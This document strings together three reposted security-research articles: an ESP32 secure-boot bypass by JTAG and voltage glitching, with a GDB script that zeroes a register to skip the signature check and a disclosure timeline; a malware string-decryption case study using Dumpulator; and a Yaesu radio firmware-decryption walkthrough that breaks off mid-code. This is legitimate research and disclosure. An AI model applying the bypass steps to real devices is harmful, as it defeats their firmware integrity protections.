After reset, the Program Counter (PC) is directly landing at 0x40000400 aka the reset vector address, CPU is halted, and I have full control of the BootROM code flow.

Digging into the BootROM

The Dump

I dump the BootROM through the JTAG interface.

The Reverse

Note: I don’t detail the entire reverse here because it would take too long.

I am not the first working on this this ESP32 bootROM. This guys here and here did awesome jobs.

I became a little bit more familiar with Xtensa ISA since last year. Using IDA and a good plug-in from here, I was able to figure out.

The ISA reference manual is available here.

Digging into the Xtensa BootROM code, I finally identified a bnei instruction (0x400075B7) after ets_secure_boot_check_finish:

ecure boot final check BNEI (branch instruction validating or not the signed image).

The PC has to reach 0x400075C5 (right side) after the branch instruction (bnei) to validate the unsigned bootloader.
Let’s use and GDB over JTAG to confirm it.

Exploit validation (via GDB)

As seen above, patching the value inside the register a10 should be enough to reach 0x400075C5. Here is the GDB script example able to bypass the secure boot check, to finally execute my own image :

target remote localhost:3333
monitor reset halt
hb *0x400075B7
continue
set $a10 = 0
continue

Then:

$ xtensa-esp32-elf-gdb -x exploit.gdb

PoC video

Let’s set to 0 the a10 register to bypass the secure boot (via JTAG access).

Of course, other patching exploits are possible…But now, I just need to reproduce that, without using JTAG 🙂

Time to Pwn (for Real)

To reproduce this exploit, I can only use fault injection because it’s the only way to interact with the ESP32 bootROM code (no control otherwise).

The target

The LOLIN board will be used for the PoC:

LOLIN dev-kit (10$ on Amazon)

I configure the second board to enable the secure boot. Here is the device’s eFuses:

eFuses Security configuration of the device under test. Secure boot enabled, JTAG disabled, Console debug disabled.

Power domains (Round 2)

During my post on ‘DFA warm-up’ here, I already modified VDD_CPU line to attach directly the output of the glitcher to the VDD_CPU pin.

Surprisingly, during my first tests, glitching the VDD_CPU did not affect so much the normal behaviour of the chip during the bootROM process. 

I have to find a solution. After probing some lines, I am suspecting the VDD_RTC plays a important role during the bootROM process.

Consequently, I decide to double glitch on the VDD_CPU and VDD_RTC simultaneously, to provide maximum voltage drop-out during the bootROM execution.

I cut the VDD_RTC line and I solder a second magnet wire to the VDD_RTC pin. The final PCB looks like that:

Glitch on VDD_CPU and VDD_RTC simultaneously. SMD grabber on MOSI pin.

The SMD grabber is connected to the MOSI. I will be able to see the activity on the SPI bus between the SPI, storing the bootloader image, and the ESP32, which will authenticate and run the image). 

This MOSI signal gives a nice timing information (see CH2 on scope screens below).

Hardware Setup

I use python to script and synchronise all the equipments:

Final setup to pwn the ESP32 secure boot.

It is time to obtain results, I would say.

Fault session

ESP32 Stuck in a loop

As already explained, the ESP32 automatically reset after each secure boot check:

ets Jun  8 2016 00:22:57                                                        
 rst:0x10 (RTCWDT_RTC_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)                     
 configsip: 0, SPIWP:0xee                                                        
 clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00         
 mode:DIO, clock div:2                                                           
 load:0x3fff0018,len:4                                                           
 load:0x3fff001c,len:8556                                                        
 load:0x40078000,len:12064                                                       
 load:0x40080400,len:7088                                                        
 secure boot check fail                                                          
 ets_main.c 371                                                                  
 ets Jun  8 2016 00:22:57
...(infinite loop)     

Timing Fault

Here is a scope capture:

Secure boot check fail. CH1= UART TX; CH2=SPI MOSI

The signature verification is obviously achieved between the last SPI data frames and the UART error message ‘secure boot check fail’ (RS232-TX). 

Glitch effect is visible on the UART line (CH1).

According to what I saw during the BootROM reverse, the ets_secure_boot_check_finish is a tiny function and I am pretty sure about its timing location. It is why I am starting to glitch near to the end of the SPI flash MOSI data (CH2).

Fault injections is like fishing. When you are sure you are in a good spot with the good rods and fresh baits, you just have to wait. It is just a matter of time to obtain the good behavior:

Entry Point 0x400807a0 => Secure boot bypassed.
Cheers!

Note: Glitch Timing is really dependent of the setup.

Once the glitch is successful, the CPU is jumping to the entry point (see entry 0x400807a0 on scope) and the unsigned bootloader previously loaded in SRAM0 is then executed. Secure boot is bypassed and the attack is effective until the next reset. 

Here is the UART log when the attack is successful:

st:0x10 (RTCWDT_RTC_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)                     
 configsip: 0, SPIWP:0xee                                                        
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00         
 mode:DIO, clock div:2                                                           
 load:0x3fff0018,len:4                                                           
 load:0x3fff001c,len:8556                                                        
 load:0x40078000,len:12064                                                       
 load:0x40080400,len:7088                                                        
 entry 0x400807a0                                                                
 D (88) bootloader_flash: mmu set block paddr=0x00000000 (was 0xffffffff)        
 I (38) boot: ESP-IDF v4.0-dev-667-gda13efc-dirty 2nd stage bootloader           
...
...
...
 I (487) cpu_start: Pro cpu start user code                                      
 I (169) cpu_start: Starting scheduler on PRO CPU.                               
 Sec boot pwned by LimitedResults!                                               
 Sec boot pwned by LimitedResults!                                               
 Sec boot pwned by LimitedResults!                                               
...(infinite loop)   

Original PoC video

Sorry for the tilt:

Original PoC

Conclusion

A complete exploit on the ESP32 secure boot using voltage glitching technique has been presented.
First, BootROM was reversed to find the function in charge to verify the bootloader signature. Then, an exploit was prepared using patching function over JTAG on a first ESP32 board. Finally, the exploit was reproduced on a second ESP32 board, using voltage fault injection to disrupt the BootROM process, to finally execute unsigned firmware on ESP32.

All the ESP32 already shipped (with only secure boot enabled) are vulnerable. 

Due to the low-complexity of the attack, it can be reproduced on the field easily, (less than one day and using less than 1000$ equipment).

This vulnerability cannot be fixed without Hardware Revision. Espressif has already shipped dozens of Millions of devices.

The only way to mitigate is certainly to use Secure Boot + Flash Encryption configuration. But maybe not after all, teaser here.

Stay tuned for the final act!

Timeline Disclosure

04/06/2019: Email sent to Espressif with the PoC video.

05/06/2019: Espressif team is asking for more details. 

01/08/2019: Light report on Secure Boot + PoC sent to Espressif. Espressif announces a second team has also reported something very similar (they did not want to disclose details about this team). Espressif proposes to go for CVE.

12/08/2019: Espressif is OK for 30-days disclosure process. Espressif announces they may decide to not register CVE.

30/08/2019: Espressif announces CVE is on going.

01/09/2019: Posted.

UPDATE

02/09/2019: Security advisory from Espressif released here.

05/09/2019: Espressif provides Common Vulnerabilities and Exposures number CVE-2019-15894. Link here.

[Case study] Decrypt strings using Dumpulator

[Case study] Decrypt strings using Dumpulator

Original text by m4n0w4r

1. References
2. Code analysis

I received a suspicious Dll that needs to be analyzed. This Dll is packed. After unpacking it and throwing the Dll into IDA, IDA successfully analyzed it with over 7000 functions (including API/library function calls). Upon quickly examining at the Strings tab, I came across numerous strings in the following format:

Based on the information provided, I believe these strings have definitely been encrypted. Going through the code snippet using an arbitrary string, I found the corresponding assembly code and pseudocode as follows (function and variable names have been changed accordingly):

With the image above, it is easy to see:

  • The 
    <mark><strong>EAX</strong>&nbsp;</mark>
    register will hold the address of the encrypted string.
  • The 
    <mark><strong>EDX</strong>&nbsp;</mark>
    register will hold the address of the string after decryption.
  • The 
    <mark><strong>mw_decrypt_str_wrap</strong>&nbsp;</mark>
    function performs the task of decrypting the string.

Here, if any of you have the same idea of analyzing the 

<mark><strong>mw_decrypt_str_wrap</strong> </mark>
function to rewrite the IDApython code for decryption, congratulations to you 🙂 You share the same thought as me! The 
<mark><strong>mw_decrypt_str_wrap</strong> </mark>
function will call the 
<mark><strong>mw_decrypt_str</strong> </mark>
function.

After going around various functions and thinking about how to code, I started feeling increasingly discouraged. Moreover, when examining the cross-references to the 

<mark>mw_decrypt_str_wrap </mark>
function, I noticed that it was called over 4000 times to decrypt strings… WTF 😐

3. Use dumpulator

As shown in the above image, there are too many function calls to the decryption function. Moreover, rewriting this decryption function would be time-consuming and require code debugging for verification. I think I need to find a way to emulate this function to perform the decryption step and retrieve the decrypted string. Several solutions came to mind, and I also asked my brother, who suggested using x or y solutions. After some trial and error, I decided to try using dumpulator. To be able to use dumpulator, we first need to create a minidump file of this DLL (dump when halted at DllEntryPoint). After obtaining the dump file, I tested the following code snippet:

from dumpulator import Dumpulator
 
dec_str_fn = 0x02FE08C0
enc_str_offset = 0x02FD9988
 
dp = Dumpulator("mal_dll.dmp", quiet=True)
tmp_addr = dp.allocate(256)
dp.call(dec_str_fn, [], regs={'eax':enc_str_offset , 'edx': tmp_addr})
dec_str = dp.read_str(dp.read_long(tmp_addr))
print(f"Encrypted string: '{dp.read_str(enc_str_offset)}'")
print(f"Decrypted string: '{dec_str}'")

Result when executing the above code:

0ly Sh1T… 😂 that’s exactly what I wanted.

Next, I will rewrite the code according to my intention as follows:

  • Use regex to search for patterns and extract all encoded string addresses.
  • Filter out addresses that match the pattern but are not decryption functions or undefined addresses and add them to the 
    <mark>BLACK_LIST</mark>
    .

Here’s a lame code snippet that meets my needs:

import re
import struct
import pefile
from dumpulator import Dumpulator
 
dump_image_base = 0x2F80000
dec_str_fn = 0x02FE08C0
 
BLACK_LIST = [0x3027520, 0x30380b6, 0x30380d0, 0x3039a08, 0x3039169, 0x303a6b6, 0x303aa0e, 0x303ab5c, 0x303bbf3, 0x3066075, 0x306661b, 0x3083e50,
              0x3084373, 0x30856d1, 0x30858aa, 0x308c7ac, 0x308d02d, 0x30acbfd, 0x30cd12e, 0x30cd187, 0x30cd670, 0x30cd6d4, 0x30cfe2f, 0x30d4cc4,
              0x3106da0]
 
FILE_PATH = 'dumped_dll.dll'
dp = Dumpulator("mal_dll.dmp", quiet=True)
 
file_data = open(FILE_PATH, 'rb').read()
pe = pefile.PE(data=file_data)
 
egg = rb'\x8D\x55.\xB8(....)\xE8....\x8b.'
tmp_addr = dp.allocate(256)
 
def decrypt_str(xref_addr, enc_str_offset):    
    print(f"Processing xref address at: {hex(xref_addr)}")
    print(f"Encryped string offset: {hex(enc_str_offset)}")
    dp.call(dec_str_fn, [], regs={'eax': enc_str_offset, 'edx': tmp_addr})
    dec_str = dp.read_str(dp.read_long(tmp_addr))
    print(f"{hex(xref_addr)}: {dec_str}\n")
    return dec_str
     
for m in re.finditer(egg, file_data):
    enc_str_offset = struct.unpack('<I', m.group(1))[0]
    inst_offset = m.start() 
    enc_str_offset_in_dmp = enc_str_offset - 0x400000 + dump_image_base
    call_fn_addr = inst_offset + 8 - 0x400 + dump_image_base + 0x1000
    if call_fn_addr not in BLACK_LIST:
        str_ret =  decrypt_str(call_fn_addr, enc_str_offset_in_dmp)
 
print(f"H0lY SH1T... IT's D0NE!!!")

Result when executing the above script:

No errors whatsoever 😈!!! As a final step, I added a code snippet to this script that will output a Python file. This file will contain the 

<mark><strong>idc.set_cmt</strong>&nbsp;</mark>
commands to set comment for the decrypted strings above at the address where the decrypt function is called. 

The final result is as follows:

End.

m4n0w4r

Reverse Engineering Yaesu FT-70D Firmware Encryption

Reverse Engineering Yaesu FT-70D Firmware Encryption

Original text by landaire

This article dives into my full methodology for reverse engineering the tool mentioned in this article. It’s a bit longer but is intended to be accessible to folks who aren’t necessarily advanced reverse-engineers.

Background

Ham radios are a fun way of learning how the radio spectrum works, and more importantly: they’re embedded devices that may run weird chips/firmware! I got curious how easy it’d be to hack my Yaesu FT-70D, so I started doing some research. The only existing resource I could find for Yaesu radios was someone who posted about custom firmware for their Yaesu FT1DR.

The Reddit poster mentioned that if you go through the firmware update process via USB, the radio exposes its Renesas H8SX microcontroller and can have its flash modified using the Renesas SDK. This was a great start and looked promising, but the SDK wasn’t trivial to configure and I wasn’t sure if it could even dump the firmware… so I didn’t use it for very long.

Other Avenues

Yaesu provides a Windows application on their website that can be used to update a radio’s firmware over USB:

The zip contains the following files:

1.2 MB  Wed Nov  8 14:34:38 2017  FT-70D_ver111(USA).exe
682 KB  Tue Nov 14 00:00:00 2017  FT-70DR_DE_Firmware_Update_Information_ENG_1711-B.pdf
8 MB  Mon Apr 23 00:00:00 2018  FT-70DR_DE_MAIN_Firmware_Ver_Up_Manual_ENG_1804-B.pdf
3.2 MB  Fri Jan  6 17:54:44 2012  HMSEUSBDRIVER.exe
160 KB  Sat Sep 17 15:14:16 2011  RComms.dll
61 KB  Tue Oct 23 17:02:08 2012  RFP_USB_VB.dll
1.7 MB  Fri Mar 29 11:54:02 2013  vcredist_x86.exe

I’m going to assume that the file specific to the FT-70D, «FT-70D_ver111(USA).exe», will likely contain our firmware image. A PE file (.exe) can contain binary resources in the 

.rsrc
 section — let’s see what this file contains using XPEViewer:

Resources fit into one of many different resource types, but a firmware image would likely be put into a custom type. What’s this last entry, «23»? Expanding that node we have a couple of interesting items:

RES_START_DIALOG
 is a custom string the updater shows when preparing an update, so we’re in the right area!

RES_UPDATE_INFO
 looks like just binary data — perhaps this is our firmware image? Unfortunately looking at the «Strings» tab in XPEViewer or running the 
strings
 utility over this data doesn’t yield anything legible. The firmware image is likely encrypted.

Reverse Engineering the Binary

Let’s load the update utility into our disassembler of choice to figure out how the data is encrypted. I’ll be using IDA Pro, but Ghidra (free!), radare2 (free!), or Binary Ninja are all great alternatives. Where possible in this article I’ll try to show my rewritten code in C since it’ll be a closer match to the decompiler and machine code output.

A good starting point is the the string we saw above, 

RES_UPDATE_INFO
. Windows applications load resources by calling one of the 
FindResource*
 APIs
FindResourceA
 has the following parameters:

  1. HMODULE
    , a handle to the module to look for the resource in.
  2. lpName
    , the resource name.
  3. lpType
    , the resource type.

In our disassembler we can find references to the 

RES_UPDATE_INFO
 string and look for calls to 
FindResourceA
 with this string as an argument in the 
lpName
 position.

We find a match in a function which happens to find/load all of these custom resources under type 

23
.

We know where the data is loaded by the application, so now we need to see how it’s used. Doing static analysis from this point may be more work than it’s worth if the data isn’t operated on immediately. To speed things up I’m going to use a debugger’s assistance. I used WinDbg’s Time Travel Debugging to record an execution trace of the updater while it updates my radio. TTD is an invaluable tool and I’d highly recommend using it when possible. rr is an alternative for non-Windows platforms.

The decompiler output shows this function copies the 

RES_UPDATE_INFO
 resource to a dynamically allocated buffer. The 
qmemcpy()
 is inlined and represented by a 
rep movsd
 instruction in the disassembly, so we need to break at this instruction and examine the 
edi
 register’s (destination address) value. I set a breakpoint by typing 
bp 0x406968
 in the command window, allow the application to continue running, and when it breaks we can see the 
edi
 register value is 
0x2be5020
. We can now set a memory access breakpoint at this address using 
ba r4 0x2be5020
 to break whenever this data is read.

Our breakpoint is hit at 

0x4047DC
 — back to the disassembler. In IDA you can press 
G
 and enter this address to jump to it. We’re finally at what looks like the data processing function:

We broke when dereferencing 

v2
 and IDA has automatically named the variable it’s being assigned to as 
Time
. The 
Time
 variable is passed to another function which formats it as a string with 
%Y%m%d%H%M%S
. Let’s clean up the variables to reflect what we know:

bool __thiscall sub_4047B0(char *this)
{
  char *encrypted_data; // esi
  BOOL v3; // ebx
  char *v4; // eax
  char *time_string; // [esp+Ch] [ebp-320h] BYREF
  int v7; // [esp+10h] [ebp-31Ch] BYREF
  __time64_t Time; // [esp+14h] [ebp-318h] BYREF
  int (__thiscall **v9)(void *, char); // [esp+1Ch] [ebp-310h]
  int v10; // [esp+328h] [ebp-4h]

  // rename v2 to encrypted_data
  encrypted_data = *(char **)(*((_DWORD *)AfxGetModuleState() + 1) + 160);
  Time = *(int *)encrypted_data;
  // rename this function and its 2nd parameter
  format_timestamp(&Time, (int)&time_string, "%Y%m%d%H%M%S");
  v10 = 1;
  v7 = 0;
  v9 = off_4244A0;
  sub_4082C0(time_string);
  v3 = sub_408350(encrypted_data + 4, 0x100000, this + 92, 0x100000, &v7) == 0;
  v4 = time_string - 16;
  v9 = off_4244A0;
  v10 = -1;
  if ( _InterlockedDecrement((volatile signed __int32 *)time_string - 1) <= 0 )
    (*(void (__stdcall **)(char *))(**(_DWORD **)v4 + 4))(v4);
  return v3;
}

The timestamp string is passed to 

sub_4082c0
 on line 20 and the remainder of the update image is passed to 
sub_408350
 on line 21. I’m going to focus on 
sub_408350
 since I only care about the firmware data right now and based on how this function is called I’d wager its signature is something like:

status_t sub_408350(uint8_t *input, size_t input_len, uint8_t *output, output_len, size_t *out_data_processed);

Let’s see what it does:

int __stdcall sub_408350(char *a1, int a2, int a3, int a4, _DWORD *a5)
{
  int v5; // edx
  int v7; // ebp
  int v8; // esi
  unsigned int i; // ecx
  char v10; // al
  char *v11; // eax
  int v13; // [esp+10h] [ebp-54h]
  char v14[64]; // [esp+20h] [ebp-44h] BYREF

  v5 = a2;
  v7 = 0;
  memset(v14, 0, sizeof(v14));
  if ( a2 <= 0 )
  {
LABEL_13:
    *a5 = v7;
    return 0;
  }
  else
  {
    while ( 1 )
    {
      v8 = v5;
      if ( v5 >= 8 )
        v8 = 8;
      v13 = v5 - v8;
      for ( i = 0; i < 0x40; i += 8 )
      {
        v10 = *a1;
        v14[i] = (unsigned __int8)*a1 >> 7;
        v14[i + 1] = (v10 & 0x40) != 0;
        v14[i + 2] = (v10 & 0x20) != 0;
        v14[i + 3] = (v10 & 0x10) != 0;
        v14[i + 4] = (v10 & 8) != 0;
        v14[i + 5] = (v10 & 4) != 0;
        v14[i + 6] = (v10 & 2) != 0;
        v14[i + 7] = v10 & 1;
        ++a1;
      }
      sub_407980(v14, 0);
      if ( v8 )
        break;
LABEL_12:
      if ( v13 <= 0 )
        goto LABEL_13;
      v5 = v13;
    }
    v11 = &v14[1];
    while ( 1 )
    {
      --v8;
      if ( v7 >= a4 )
        return -101;
      *(_BYTE *)(a3 + v7++) = v11[6] | (2
                                      * (v11[5] | (2
                                                 * (v11[4] | (2
                                                            * (v11[3] | (2
                                                                       * (v11[2] | (2
                                                                                  * (v11[1] | (2
                                                                                             * (*v11 | (2 * *(v11 - 1))))))))))))));
      v11 += 8;
      if ( !v8 )
        goto LABEL_12;
    }
  }
}

I think we’ve found our function that starts decrypting the firmware! To confirm, we want to see what the 

output
 parameter’s data looks like before and after this function is called. I set a breakpoint in the debugger at the address where it’s called (
bp 0x404842
) and put the value of the 
edi
 register (
0x2d7507c
) in WinDbg’s memory window.

Here’s the data before:

After stepping over the function call:

We can dump this data to a file using the following command:

.writemem C:\users\lander\documents\maybe_deobfuscated.bin 0x2d7507c L100000

010 Editor has a built-in strings utility (Search > Find Strings…) and if we scroll down a bit in the results, we have real strings that appear in my radio!

At this point if we were just interested in getting the plaintext firmware we could stop messing with the binary and load the firmware into IDA Pro… but I want to know how this encryption works.

Encryption Details

Just to recap from the last section:

  • We’ve identified our data processing routine (let’s call this function 
    decrypt_update_info
    ).
  • We know that the first 4 bytes of the update data are a Unix timestamp that’s formatted as a string and used for an unknown purpose.
  • We know which function begins decrypting our firmware image.

Data Decryption

Let’s look at the firmware image decryption routine with some renamed variables:

int __thiscall decrypt_data(
        void *this,
        char *encrypted_data,
        int encrypted_data_len,
        char *output_data,
        int output_data_len,
        _DWORD *bytes_written)
{
  int data_len; // edx
  int output_index; // ebp
  int block_size; // esi
  unsigned int i; // ecx
  char encrypted_byte; // al
  char *idata; // eax
  int remaining_data; // [esp+10h] [ebp-54h]
  char inflated_data[64]; // [esp+20h] [ebp-44h] BYREF

  data_len = encrypted_data_len;
  output_index = 0;
  memset(inflated_data, 0, sizeof(inflated_data));
  if ( encrypted_data_len <= 0 )
  {
LABEL_13:
    *bytes_written = output_index;
    return 0;
  }
  else
  {
    while ( 1 )
    {
      block_size = data_len;
      if ( data_len >= 8 )
        block_size = 8;
      remaining_data = data_len - block_size;

      // inflate 1 byte of input data to 8 bytes of its bit representation
      for ( i = 0; i < 0x40; i += 8 )
      {
        encrypted_byte = *encrypted_data;
        inflated_data[i] = (unsigned __int8)*encrypted_data >> 7;
        inflated_data[i + 1] = (encrypted_byte & 0x40) != 0;
        inflated_data[i + 2] = (encrypted_byte & 0x20) != 0;
        inflated_data[i + 3] = (encrypted_byte & 0x10) != 0;
        inflated_data[i + 4] = (encrypted_byte & 8) != 0;
        inflated_data[i + 5] = (encrypted_byte & 4) != 0;
        inflated_data[i + 6] = (encrypted_byte & 2) != 0;
        inflated_data[i + 7] = encrypted_byte & 1;
        ++encrypted_data;
      }
      // do something with the inflated data
      sub_407980(this, inflated_data, 0);
      if ( block_size )
        break;
LABEL_12:
      if ( remaining_data <= 0 )
        goto LABEL_13;
      data_len = remaining_data;
    }
    // deflate the data back to bytes
    idata = &inflated_data[1];
    while ( 1 )
    {
      --block_size;
      if ( output_index >= output_data_len )
        return -101;
      output_data[output_index++] = idata[6] | (2
                                              * (idata[5] | (2
                                                           * (idata[4] | (2
                                                                        * (idata[3] | (2
                                                                                     * (idata[2] | (2
                                                                                                  * (idata[1] | (2 * (*idata | (2 * *(idata - 1))))))))))))));
      idata += 8;
      if ( !block_size )
        goto LABEL_12;
    }
  }
}

At a high level this routine:

  1. Allocates a 64-byte scratch buffer
  2. Checks if there’s any data to process. If not, set the output variable 
    out_data_processed
     to the number of bytes processed and return 0x0 (
    STATUS_SUCCESS
    )
  3. Loop over the input data in 8-byte chunks and inflate each byte to its bit representation.
  4. After the 8-byte chunk is inflated, call 
    sub_407980
     with the scratch buffer and 
    0
     as arguments.
  5. Loop over the scratch buffer and reassemble 8 sequential bits as 1 byte, then set the byte at the appropriate index in the output buffer.

Lots going on here, but let’s take a look at step #3. If we take the bytes 

0xAA
 and 
0x77
 which have bit representations of 
0b1010_1010
 and 
0b0111_1111
 respectively and inflate them to a 16-byte array using the algorithm above, we end up with:

| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 |    | 8 | 9 | A | B | C | D | E | F |
|---|---|---|---|---|---|---|---|----|---|---|---|---|---|---|---|---|
| 1 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |    | 0 | 1 | 1 | 1 | 0 | 1 | 1 | 1 |

This routine does this process over 8 bytes at a time and completely fills the 64-byte scratch buffer with 1s and 0s just like the table above.

Now let’s look at step #4 and see what’s going on in 

sub_407980
:

_BYTE *__thiscall sub_407980(void *this, _BYTE *a2, int a3)
{
  // long list of stack vars removed for clarity

  v3 = (int)this;
  v4 = 15;
  v5 = a3;
  v32[0] = (int)this;
  v28 = 0;
  v31 = 15;
  do
  {
    for ( i = 0; i < 48; *((_BYTE *)&v33 + i + 3) = v18 )
    {
      v7 = v28;
      if ( !v5 )
        v7 = v4;
      v8 = *(_BYTE *)(i + 48 * v7 + v3 + 4) ^ a2[(unsigned __int8)byte_424E50[i] + 31];
      v9 = v28;
      *(&v34 + i) = v8;
      if ( !v5 )
        v9 = v4;
      v10 = *(_BYTE *)(i + 48 * v9 + v3 + 5) ^ a2[(unsigned __int8)byte_424E51[i] + 31];
      v11 = v28;
      *(&v35 + i) = v10;
      if ( !v5 )
        v11 = v4;
      v12 = *(_BYTE *)(i + 48 * v11 + v3 + 6) ^ a2[(unsigned __int8)byte_424E52[i] + 31];
      v13 = v28;
      *(&v36 + i) = v12;
      if ( !v5 )
        v13 = v4;
      v14 = *(_BYTE *)(i + 48 * v13 + v3 + 7) ^ a2[(unsigned __int8)byte_424E53[i] + 31];
      v15 = v28;
      v38[i - 1] = v14;
      if ( !v5 )
        v15 = v4;
      v16 = *(_BYTE *)(i + 48 * v15 + v3 + 8) ^ a2[(unsigned __int8)byte_424E54[i] + 31];
      v17 = v28;
      v38[i] = v16;
      if ( !v5 )
        v17 = v4;
      v18 = *(_BYTE *)(i + 48 * v17 + v3 + 9) ^ a2[(unsigned __int8)byte_424E55[i] + 31];
      i += 6;
    }
    v32[1] = *(int *)((char *)&dword_424E80
                    + (((unsigned __int8)v38[0] + 2) | (32 * v34 + 2) | (16 * (unsigned __int8)v38[1] + 2) | (8 * v35 + 2) | (4 * v36 + 2) | (2 * v37 + 2)));
    v32[2] = *(int *)((char *)&dword_424F80
                    + (((unsigned __int8)v38[6] + 2) | (32 * (unsigned __int8)v38[2] + 2) | (16
                                                                                           * (unsigned __int8)v38[7]
                                                                                           + 2) | (8
                                                                                                 * (unsigned __int8)v38[3]
                                                                                                 + 2) | (4 * (unsigned __int8)v38[4] + 2) | (2 * (unsigned __int8)v38[5] + 2)));
    v32[3] = *(int *)((char *)&dword_425080
                    + (((unsigned __int8)v38[12] + 2) | (32 * (unsigned __int8)v38[8] + 2) | (16
                                                                                            * (unsigned __int8)v38[13]
                                                                                            + 2) | (8 * (unsigned __int8)v38[9]
                                                                                                  + 2) | (4 * (unsigned __int8)v38[10] + 2) | (2 * (unsigned __int8)v38[11] + 2)));
    v32[4] = *(int *)((char *)&dword_425180
                    + (((unsigned __int8)v38[18] + 2) | (32 * (unsigned __int8)v38[14] + 2) | (16
                                                                                             * (unsigned __int8)v38[19]
                                                                                             + 2) | (8 * (unsigned __int8)v38[15] + 2) | (4 * (unsigned __int8)v38[16] + 2) | (2 * (unsigned __int8)v38[17] + 2)));
    v32[5] = *(int *)((char *)&dword_425280
                    + (((unsigned __int8)v38[24] + 2) | (32 * (unsigned __int8)v38[20] + 2) | (16
                                                                                             * (unsigned __int8)v38[25]
                                                                                             + 2) | (8 * (unsigned __int8)v38[21] + 2) | (4 * (unsigned __int8)v38[22] + 2) | (2 * (unsigned __int8)v38[23] + 2)));
    v32[6] = *(int *)((char *)&dword_425380
                    + (((unsigned __int8)v38[30] + 2) | (32 * (unsigned __int8)v38[26] + 2) | (16
                                                                                             * (unsigned __int8)v38[31]
                                                                                             + 2) | (8 * (unsigned __int8)v38[27] + 2) | (4 * (unsigned __int8)v38[28] + 2) | (2 * (unsigned __int8)v38[29] + 2)));
    v32[7] = *(int *)((char *)&dword_425480
                    + (((unsigned __int8)v38[36] + 2) | (32 * (unsigned __int8)v38[32] + 2) | (16
                                                                                             * (unsigned __int8)v38[37]
                                                                                             + 2) | (8 * (unsigned __int8)v38[33] + 2) | (4 * (unsigned __int8)v38[34] + 2) | (2 * (unsigned __int8)v38[35] + 2)));
    v19 = (char *)(&unk_425681 - (_UNKNOWN *)a2);
    v20 = &unk_425680 - (_UNKNOWN *)a2;
    v33 = *(int *)((char *)&dword_425580
                 + (((unsigned __int8)v38[42] + 2) | (32 * (unsigned __int8)v38[38] + 2) | (16
                                                                                          * (unsigned __int8)v38[43]
                                                                                          + 2) | (8
                                                                                                * (unsigned __int8)v38[39]
                                                                                                + 2) | (4 * (unsigned __int8)v38[40] + 2) | (2 * (unsigned __int8)v38[41] + 2)));
    result = a2;
    if ( v4 <= 0 )
    {
      v30 = 8;
      do
      {
        *result ^= *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);
        result[1] ^= *((_BYTE *)v32 + (unsigned __int8)v19[(_DWORD)result] + 3);
        result[2] ^= *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2] + 3);
        result[3] ^= *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2] + 3);
        result += 4;
        --v30;
      }
      while ( v30 );
    }
    else
    {
      v29 = 8;
      do
      {
        v24 = result[32];
        v22 = *result ^ *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);
        result += 4;
        result[28] = v22;
        *(result - 4) = v24;
        v25 = result[29];
        result[29] = *(result - 3) ^ *((_BYTE *)v32 + (unsigned __int8)result[(_DWORD)v19 - 4] + 3);
        *(result - 3) = v25;
        v26 = result[30];
        result[30] = *(result - 2) ^ *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2 - 4] + 3);
        *(result - 2) = v26;
        v27 = result[31];
        result[31] = *(result - 1) ^ *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2 - 4] + 3);
        *(result - 1) = v27;
        --v29;
      }
      while ( v29 );
    }
    v5 = a3;
    v3 = v32[0];
    v4 = v31 - 1;
    v23 = v31 - 1 <= -1;
    ++v28;
    --v31;
  }
  while ( !v23 );
  return result;
}

Oof. This is substantially more complicated but looks like the meat of the decryption algorithm. We’ll refer to this function, 

sub_407980
, as 
decrypt_data
 from here on out. We can see what may be an immediate roadblock: this function takes in a C++ 
this
 pointer (line 5) and performs bitwise operations on one of its members (line 18, 23, etc.). For now let’s call this class member 
key
 and come back to it later.

This function is the perfect example of decompilers emitting less than ideal code as a result of compiler optimizations/code reordering. For me, TTD was essential for following how data flows through this function. It took a few hours of banging my head against IDA and WinDbg to understand, but this function can be broken up into 3 high-level phases:

  1. Building a 48-byte buffer containing our key material XOR’d with data from a static table.
int v33;
  unsigned __int8 v34; // [esp+44h] [ebp-34h]
  unsigned __int8 v35; // [esp+45h] [ebp-33h]
  unsigned __int8 v36; // [esp+46h] [ebp-32h]
  unsigned __int8 v37; // [esp+47h] [ebp-31h]
  char v38[44]; // [esp+48h] [ebp-30h]

  v3 = (int)this;
  v4 = 15;
  v5 = a3;
  v32[0] = (int)this;
  v28 = 0;
  v31 = 15;
  do
  {
    // The end statement of this loop is strange -- it's writing a byte somewhere? come back
    // to this later
    for ( i = 0; i < 48; *((_BYTE *)&v33 + i + 3) = v18 )
    {
    // v28 Starts at 0 but is incremented by 1 during each iteration of the outer `while` loop
      v7 = v28;
      // v5 is our last argument which was 0
      if ( !v5 )
        // overwrite v7 with v4, which begins at 15 but is decremented by 1 during each iteration
        // of the outer `while` loop
        v7 = v4;
      // left-hand side of the xor, *(_BYTE *)(i + 48 * v7 + v3 + 4)
      //     v3 in this context is our `this` pointer + 4, giving us *(_BYTE *)(i + (48 * v7) + this->maybe_key)
      //     so the left-hand side of the xor is likely indexing into our key material:
      //     this->maybe_key[i + 48 * loop_multiplier]
      //
      // right-hand side of the xor, a2[(unsigned __int8)byte_424E50[i] + 31]
      //     a2 is our input encrypted data, and byte_424E50 is some static data
      //
      // this full statement can be rewritten as:
      //     v8 = this->maybe_key[i + 48 * loop_multiplier] ^ encrypted_data[byte_424E50[i] + 31]
      v8 = *(_BYTE *)(i + 48 * v7 + v3 + 4) ^ a2[(unsigned __int8)byte_424E50[i] + 31];

      v9 = v28;

      // write the result of `key_data ^ input_data` to a scratch buffer (v34)
      // v34 looks to be declared as the wrong type. v33 is actually a 52-byte buffer
      *(&v34 + i) = v8;

      // repeat the above 5 more times
      if ( !v5 )
        v9 = v4;
